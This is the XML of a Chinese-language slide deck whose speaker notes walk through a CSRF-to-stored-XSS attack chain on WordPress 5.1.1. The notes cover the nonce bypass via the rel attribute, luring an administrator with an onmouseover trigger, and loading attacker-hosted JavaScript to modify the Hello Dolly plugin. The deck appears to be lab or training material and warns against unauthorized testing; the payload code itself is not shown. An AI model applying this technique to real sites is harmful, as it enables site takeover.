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473" r:id="rId2"/>
    <p:sldId id="551" r:id="rId3"/>
    <p:sldId id="555" r:id="rId4"/>
    <p:sldId id="554" r:id="rId5"/>
    <p:sldId id="552" r:id="rId6"/>
    <p:sldId id="556" r:id="rId7"/>
    <p:sldId id="557" r:id="rId8"/>
    <p:sldId id="563" r:id="rId9"/>
    <p:sldId id="564" r:id="rId10"/>
    <p:sldId id="559" r:id="rId11"/>
    <p:sldId id="560" r:id="rId12"/>
    <p:sldId id="561" r:id="rId13"/>
    <p:sldId id="562" r:id="rId14"/>
    <p:sldId id="553" r:id="rId15"/>
    <p:sldId id="531" r:id="rId16"/>
    <p:sldId id="576" r:id="rId17"/>
    <p:sldId id="565" r:id="rId18"/>
    <p:sldId id="566" r:id="rId19"/>
    <p:sldId id="568" r:id="rId20"/>
    <p:sldId id="567" r:id="rId21"/>
    <p:sldId id="532" r:id="rId22"/>
    <p:sldId id="544" r:id="rId23"/>
    <p:sldId id="574" r:id="rId24"/>
    <p:sldId id="570" r:id="rId25"/>
    <p:sldId id="571" r:id="rId26"/>
    <p:sldId id="572" r:id="rId27"/>
    <p:sldId id="573" r:id="rId28"/>
    <p:sldId id="575" r:id="rId29"/>
    <p:sldId id="490" r:id="rId30"/>
    <p:sldId id="526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843"/>
    <p:restoredTop sz="68405"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="80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221CD9-A597-FD4F-9B27-5DAD9F4EA926}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2020/9/23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BDB201D-732D-C74C-8340-995C5721180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20111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534988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他们都仅仅允许基础的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>标签和属性，，虽然</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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wp_filter_post_kses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稍微宽松一点，但是也移除了能够导致跨站脚本攻击的标签。</a:t>
            </a:r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  <a:p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85836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允许</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>验证失败的管理员账号吗、，评论</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>标签 带</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>属性的内容，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rel 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属性用于指定当前文档与被链接文档的关系。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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899025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当存在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>标签的时候，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首先将解析的每一个属性直接拼接进去并且加上双引号。 就把单引号的给过滤掉了。这里即完成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CSRF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的突破点。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kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 虽然受到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>限制，但是 能够通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>标签 和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>进行绕过。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05513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69812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100324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在登录高权状态下，，自己搭建的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>服务，截取评论上传报文，转为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>利用脚本。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00694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访问包此代码的页面。因为实际黑客攻击时候不会知道这里的值，所以实际</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 删除了这里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0288793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访问包此代码的页面。因为实际黑客攻击时候不会知道这里的值，所以把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>这里值写作</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>，表示随机的。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这里就是一个可以利用的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>利用脚本。诱导目标网站管理员。点击页面。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>改为对应的目标机器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18073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生成一条评论。。鼠标移动上去。触发弹窗。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6402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99384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26208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" dirty="0"/>
              <a:t>这里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用插件是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Hello_Dolly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Hello_Dolly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>世界上第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wordpress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>的插件，启用之后，可以在后台的右上角随机显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>《Hello Dolly》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>这首歌里面的一句歌词。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，这个是安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后自带，不需要单独安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. wp-content/plugins/hello.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>还有其他很多热门插件可以利用，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这里的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在实际中就是黑客控制的机器。实验过程中，只需要通过下方指令就可以开启一台。用作黑客机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516288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恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>脚本已经放置在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>/var/www/html.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>容器启动后网页根目录，用于模拟黑客自己的服务器</a:t>
            </a:r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88760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上方是逻辑代码。 实际执行的代码。。但是因为引号嵌套的原因，转成下面实际利用形式。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把下方代码放入评论框，截取上传报文，转为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>利用脚本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055046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模拟黑客不知道具体的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>验证代码。下方取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>实际使会在第三方网站构建无 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>触发这一环节，。 可以再</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 出直接修改为 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>onmouseover</a:t>
            </a:r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966317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/>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 触发漏洞，，因为为了演示触发过程使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>实际使用时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>事件，在鼠标已过去，无感知触发事件。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91150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16306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1057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29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96874012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x-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8BED20C-72F8-6347-A583-F969C4DCD7E4}" type="slidenum">
              <a:rPr lang="x-none" smtClean="0"/>
              <a:pPr/>
              <a:t>30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41026696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目前最新版是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.5.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到目前还有很多比较老的网站在使用，请勿在实际互联网中进行未授权测试。</a:t>
            </a:r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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设计之初</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 超级管理员就默认为服务器管理员。但实际上还有一定差别。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47700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Nonce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是加密散列，用来验证是否是正确的人或客户端所发送的请求。因为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nonce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是由字母与数字结合的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hash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值构成，（例如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md5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sha1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sha2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），是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wordpress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中的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token,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安全令牌，一般来说不太可能创建一个假的 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nonce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</a:t>
            </a:r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135703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/>
              <a:t>wordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>nonce </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>woredpress2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本引入的，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它可以在某段时间内一直有效，这里默认为一天。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从技术上讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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WordPress nonce </a:t>
            </a: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可以使用不止一次，但仅限这个定义的时间段里。不能抵御重放攻击。</a:t>
            </a:r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而且与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是由时间决定的随机数，每天的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时更新一次；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是操作；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uid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是用户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$token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是用户登陆时服务器产生的，每次登陆都不同。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike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2409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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只有请求中的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wpnonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与预期的相等，该请求才会被处理，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就很难被伪造。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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>访问此</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>假设代表删除</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>的文件，当其他人访问，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>wordPress </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>会验证</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>cookie,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>验证用户是否有权限删除</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>第三方网站页面上有如上代码，一旦登录了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>的用户点开，就会在用户</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>无感知情况带着</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://example.com/wp-admin/post.php?post=123&amp;action=delete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会判断这是一个合法请求，这就是跨站请求伪造。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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/>
              <a:t>如果带上</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>，没有这一条</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>视为无权限，有则通过，有效抵御了跨站请求伪造。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" alt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0243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当我们在后台编辑文章的时候会执行该段代码，进入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check_admin_referer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749539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这里是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证机制。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hash_equal</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数完成对比 ，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这里也可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成的过程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$expected =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substr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wp_hash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 $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'|' . $action . '|' . $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uid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. '|' . $token,'nonce'), -12, 10 );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en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是由时间决定的随机数，每天的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时与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时更新一次；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action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是操作；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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN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uid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是用户 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id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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r>
              <a:rPr lang="en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$token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是用户登陆时服务器产生的，每次登陆都不同。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kumimoji="1"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28260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但是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在处理高权限用户的评论的时候，并不会进行过滤即便是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p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WordPress Core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开发团队的认知中，任何一个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WordPress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的超级管理员，都应该保管好自己的网站以及账号安全，超级管理员也应该能对自己的网站以及服务器负责。在这样的观点设计下，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WordPress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的超级管理员可以直接修改后台插件模板来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getshell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，超级管理员的评论不会有任何过滤。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>但是在处理</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>机制的时候有点问题，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>高权用户若</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>验证通过，则不限制输入，如过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>验证不通过，则进行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>wp_filter_post_kses</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> 过滤。代码如上所示。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p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DB201D-732D-C74C-8340-995C5721180C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4024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Master" Target="../slideMasters/slideMaster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1.emf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新章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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B9FB02-04E3-BF42-A357-AC989A1EF7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560042"/>
            <a:ext cx="737727" cy="1042070"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="768350" cy="1085326"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBD8C55-40C0-1E40-ABE0-6E3A34299BF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:srgbClr val="1D499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Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D633B265-F335-CE45-AAD1-D9C3BE664AFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCFC76D-08CB-2B41-BA30-A90DC38B25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664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 10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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
